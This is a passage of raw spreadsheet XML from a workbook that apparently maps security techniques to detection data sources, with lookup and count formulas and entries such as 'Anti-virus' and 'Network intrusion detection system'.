        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E70" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F70" s="50"/>
      <c r="G70" s="19"/>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A71" s="16" t="s">
        <v>154</v>
      </c>
      <c r="B71" s="45" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:H)</f>
        <v>Log analysis,Host intrusion prevention systems,Anti-virus</v>
      </c>
      <c r="C71" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D71" s="45">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E71" s="45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F71" s="50"/>
      <c r="G71" s="19"/>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A72" s="16" t="s">
        <v>155</v>
      </c>
      <c r="B72" s="45" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C72" s="17">
        <v>0</v>
      </c>
      <c r="D72" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E72" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F72" s="50"/>
      <c r="G72" s="19"/>
    </row>
    <row r="73" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A73" s="16" t="s">
        <v>157</v>
      </c>
      <c r="B73" s="45" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C73" s="17">
        <v>0</v>
      </c>
      <c r="D73" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E73" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F73" s="50"/>
      <c r="G73" s="19"/>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A74" s="16" t="s">
        <v>159</v>
      </c>
      <c r="B74" s="45" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C74" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D74" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E74" s="45">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F74" s="50"/>
      <c r="G74" s="19"/>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A75" s="16" t="s">
        <v>160</v>
      </c>
      <c r="B75" s="45" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C75" s="17">
        <v>0</v>
      </c>
      <c r="D75" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E75" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F75" s="50"/>
      <c r="G75" s="19"/>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A76" s="16" t="s">
        <v>161</v>
      </c>
      <c r="B76" s="45" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C76" s="17">
        <v>0</v>
      </c>
      <c r="D76" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E76" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F76" s="50"/>
      <c r="G76" s="19"/>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A77" s="16" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="45" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C77" s="17">
        <v>0</v>
      </c>
      <c r="D77" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E77" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F77" s="50"/>
      <c r="G77" s="19"/>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A78" s="16" t="s">
        <v>163</v>
      </c>
      <c r="B78" s="45" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C78" s="17">
        <v>0</v>
      </c>
      <c r="D78" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E78" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F78" s="50"/>
      <c r="G78" s="19"/>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A79" s="16" t="s">
        <v>165</v>
      </c>
      <c r="B79" s="45" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:H)</f>
        <v>Firewall,Host intrusion prevention systems,Network intrusion detection system,Application control,System access controls,Anti-virus</v>
      </c>
      <c r="C79" s="17" t="s">
        <v>403</v>
      </c>
      <c r="D79" s="45">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E79" s="45">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F79" s="50"/>
      <c r="G79" s="19"/>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A80" s="16" t="s">
        <v>167</v>
      </c>
      <c r="B80" s="45" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C80" s="17">
        <v>0</v>
      </c>
      <c r="D80" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E80" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F80" s="50"/>
      <c r="G80" s="19"/>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A81" s="16" t="s">
        <v>169</v>
      </c>
      <c r="B81" s="45" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C81" s="17">
        <v>0</v>
      </c>
      <c r="D81" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E81" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F81" s="50"/>
      <c r="G81" s="19"/>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A82" s="16" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="45" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C82" s="17">
        <v>0</v>
      </c>
      <c r="D82" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E82" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F82" s="50"/>
      <c r="G82" s="19"/>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A83" s="16" t="s">
        <v>171</v>
      </c>
      <c r="B83" s="45" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C83" s="17">
        <v>0</v>
      </c>
      <c r="D83" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E83" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F83" s="50"/>
      <c r="G83" s="19"/>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A84" s="16" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="45" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C84" s="17">
        <v>0</v>
      </c>
      <c r="D84" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E84" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F84" s="50"/>
      <c r="G84" s="19"/>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A85" s="16" t="s">
        <v>173</v>
      </c>
      <c r="B85" s="45" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C85" s="17">
        <v>0</v>
      </c>
      <c r="D85" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E85" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F85" s="50"/>
      <c r="G85" s="19"/>
    </row>
    <row r="86" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A86" s="16" t="s">
        <v>174</v>
      </c>
      <c r="B86" s="45" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C86" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D86" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E86" s="45">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F86" s="50"/>
      <c r="G86" s="19"/>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A87" s="16" t="s">
        <v>176</v>
      </c>
      <c r="B87" s="45" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C87" s="17">
        <v>0</v>
      </c>
      <c r="D87" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E87" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F87" s="50"/>
      <c r="G87" s="19"/>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A88" s="16" t="s">
        <v>178</v>
      </c>
      <c r="B88" s="45" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C88" s="17">
        <v>0</v>
      </c>
      <c r="D88" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E88" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F88" s="50"/>
      <c r="G88" s="19"/>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A89" s="16" t="s">
        <v>179</v>
      </c>
      <c r="B89" s="45" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C89" s="17">
        <v>100</v>
      </c>
      <c r="D89" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E89" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F89" s="50"/>
      <c r="G89" s="19"/>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A90" s="16" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="45" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C90" s="17" t="s">
        <v>404</v>
      </c>
      <c r="D90" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E90" s="45">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F90" s="50"/>
      <c r="G90" s="19"/>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A91" s="16" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="45" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C91" s="17">
        <v>0</v>
      </c>
      <c r="D91" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E91" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F91" s="50"/>
      <c r="G91" s="19"/>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A92" s="16" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="45" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C92" s="17">
        <v>0</v>
      </c>
      <c r="D92" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E92" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F92" s="50"/>
      <c r="G92" s="19"/>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A93" s="16" t="s">
        <v>186</v>
      </c>
      <c r="B93" s="45" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C93" s="17">
        <v>0</v>
      </c>
      <c r="D93" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E93" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F93" s="50"/>
      <c r="G93" s="19"/>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A94" s="16" t="s">
        <v>187</v>
      </c>
      <c r="B94" s="45" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C94" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D94" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E94" s="45">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F94" s="50"/>
      <c r="G94" s="19"/>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A95" s="16" t="s">
        <v>188</v>
      </c>
      <c r="B95" s="45" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C95" s="17">
        <v>0</v>
      </c>
      <c r="D95" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E95" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F95" s="50"/>
      <c r="G95" s="19"/>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A96" s="16" t="s">
        <v>190</v>
      </c>
      <c r="B96" s="45" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C96" s="17">
        <v>0</v>
      </c>
      <c r="D96" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E96" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F96" s="50"/>
      <c r="G96" s="19"/>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A97" s="16" t="s">
        <v>192</v>
      </c>
      <c r="B97" s="45" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C97" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D97" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E97" s="45">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F97" s="50"/>
      <c r="G97" s="19"/>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A98" s="16" t="s">
        <v>194</v>
      </c>
      <c r="B98" s="45" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C98" s="17">
        <v>0</v>
      </c>
      <c r="D98" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E98" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F98" s="50"/>
      <c r="G98" s="19"/>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A99" s="16" t="s">
        <v>195</v>
      </c>
      <c r="B99" s="45" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C99" s="17">
        <v>0</v>
      </c>
      <c r="D99" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E99" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F99" s="50"/>
      <c r="G99" s="19"/>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A100" s="16" t="s">
        <v>196</v>
      </c>
      <c r="B100" s="45" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C100" s="17">
        <v>100</v>
      </c>
      <c r="D100" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E100" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F100" s="50"/>
      <c r="G100" s="19"/>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A101" s="16" t="s">
        <v>198</v>
      </c>
      <c r="B101" s="45" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C101" s="17">
        <v>0</v>
      </c>
      <c r="D101" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E101" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F101" s="50"/>
      <c r="G101" s="19"/>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A102" s="16" t="s">
        <v>199</v>
      </c>
      <c r="B102" s="45" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C102" s="17">
        <v>0</v>
      </c>
      <c r="D102" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E102" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F102" s="50"/>
      <c r="G102" s="19"/>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A103" s="16" t="s">
        <v>200</v>
      </c>
      <c r="B103" s="45" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C103" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D103" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E103" s="45">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F103" s="50"/>
      <c r="G103" s="19"/>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A104" s="16" t="s">
        <v>202</v>
      </c>
      <c r="B104" s="45" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C104" s="17">
        <v>0</v>
      </c>
      <c r="D104" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E104" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F104" s="50"/>
      <c r="G104" s="19"/>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A105" s="16" t="s">
        <v>203</v>
      </c>
      <c r="B105" s="45" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C105" s="17">
        <v>0</v>
      </c>
      <c r="D105" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E105" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F105" s="50"/>
      <c r="G105" s="19"/>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A106" s="16" t="s">
        <v>205</v>
      </c>
      <c r="B106" s="45" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C106" s="17">
        <v>0</v>
      </c>
      <c r="D106" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E106" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F106" s="50"/>
      <c r="G106" s="19"/>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A107" s="16" t="s">
        <v>207</v>
      </c>
      <c r="B107" s="45" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C107" s="17">
        <v>0</v>
      </c>
      <c r="D107" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E107" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F107" s="50"/>
      <c r="G107" s="19"/>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A108" s="16" t="s">
        <v>208</v>
      </c>
      <c r="B108" s="45" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C108" s="17">
        <v>100</v>
      </c>
      <c r="D108" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E108" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F108" s="50"/>
      <c r="G108" s="19"/>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A109" s="16" t="s">
        <v>210</v>
      </c>
      <c r="B109" s="45" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:H)</f>
        <v>Network intrusion detection system,Anti-virus</v>
      </c>
      <c r="C109" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D109" s="45">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E109" s="45">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F109" s="50"/>
      <c r="G109" s="19"/>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A110" s="16" t="s">
        <v>212</v>
      </c>
      <c r="B110" s="45" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:H)</f>
        <v>Network intrusion detection system,Anti-virus</v>
      </c>
      <c r="C110" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D110" s="45">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E110" s="45">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F110" s="50"/>
      <c r="G110" s="19"/>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A111" s="16" t="s">
        <v>214</v>
      </c>
      <c r="B111" s="45" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C111" s="17">
        <v>0</v>
      </c>
      <c r="D111" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E111" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F111" s="50"/>
      <c r="G111" s="19"/>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A112" s="16" t="s">
        <v>215</v>
      </c>
      <c r="B112" s="45" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C112" s="17">
        <v>0</v>
      </c>
      <c r="D112" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E112" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F112" s="50"/>
      <c r="G112" s="19"/>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A113" s="16" t="s">
        <v>216</v>
      </c>
      <c r="B113" s="45" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:H)</f>
        <v>Host forensic analysis</v>
      </c>
      <c r="C113" s="17">
        <v>100</v>
      </c>
      <c r="D113" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E113" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F113" s="50"/>
      <c r="G113" s="19"/>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A114" s="16" t="s">
        <v>218</v>
      </c>
      <c r="B114" s="45" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C114" s="17">
        <v>0</v>
      </c>
      <c r="D114" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E114" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F114" s="50"/>
      <c r="G114" s="19"/>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A115" s="16" t="s">
        <v>220</v>
      </c>
      <c r="B115" s="45" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C115" s="17">
        <v>0</v>
      </c>
      <c r="D115" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E115" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F115" s="50"/>
      <c r="G115" s="19"/>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A116" s="16" t="s">
        <v>222</v>
      </c>
      <c r="B116" s="45" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C116" s="17">
        <v>0</v>
      </c>
      <c r="D116" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E116" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F116" s="50"/>
      <c r="G116" s="19"/>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A117" s="16" t="s">
        <v>223</v>
      </c>
      <c r="B117" s="45" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C117" s="17">
        <v>100</v>
      </c>
      <c r="D117" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E117" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F117" s="50"/>
      <c r="G117" s="19"/>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A118" s="16" t="s">
        <v>224</v>
      </c>
      <c r="B118" s="45" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C118" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D118" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E118" s="45">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F118" s="50"/>
      <c r="G118" s="19"/>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A119" s="16" t="s">
        <v>225</v>
      </c>
      <c r="B119" s="45" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C119" s="17">
        <v>100</v>
      </c>
      <c r="D119" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E119" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F119" s="50"/>
      <c r="G119" s="19"/>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A120" s="16" t="s">
        <v>226</v>
      </c>
      <c r="B120" s="45" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C120" s="17">
        <v>0</v>
      </c>
      <c r="D120" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E120" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F120" s="50"/>
      <c r="G120" s="19"/>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A121" s="16" t="s">
        <v>227</v>
      </c>
      <c r="B121" s="45" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C121" s="17">
        <v>0</v>
      </c>
      <c r="D121" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E121" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F121" s="50"/>
      <c r="G121" s="19"/>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A122" s="16" t="s">
        <v>228</v>
      </c>
      <c r="B122" s="45" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C122" s="17">
        <v>100</v>
      </c>
      <c r="D122" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E122" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F122" s="50"/>
      <c r="G122" s="19"/>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A123" s="16" t="s">
        <v>229</v>
      </c>
      <c r="B123" s="45" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C123" s="17">
        <v>100</v>
      </c>
      <c r="D123" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E123" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F123" s="50"/>
      <c r="G123" s="19"/>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A124" s="16" t="s">
        <v>231</v>
      </c>
      <c r="B124" s="45" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C124" s="17">
        <v>0</v>
      </c>
      <c r="D124" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E124" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F124" s="50"/>
      <c r="G124" s="19"/>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A125" s="16" t="s">
        <v>232</v>
      </c>
      <c r="B125" s="45" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C125" s="17">
        <v>0</v>
      </c>
      <c r="D125" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E125" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F125" s="50"/>
      <c r="G125" s="19"/>
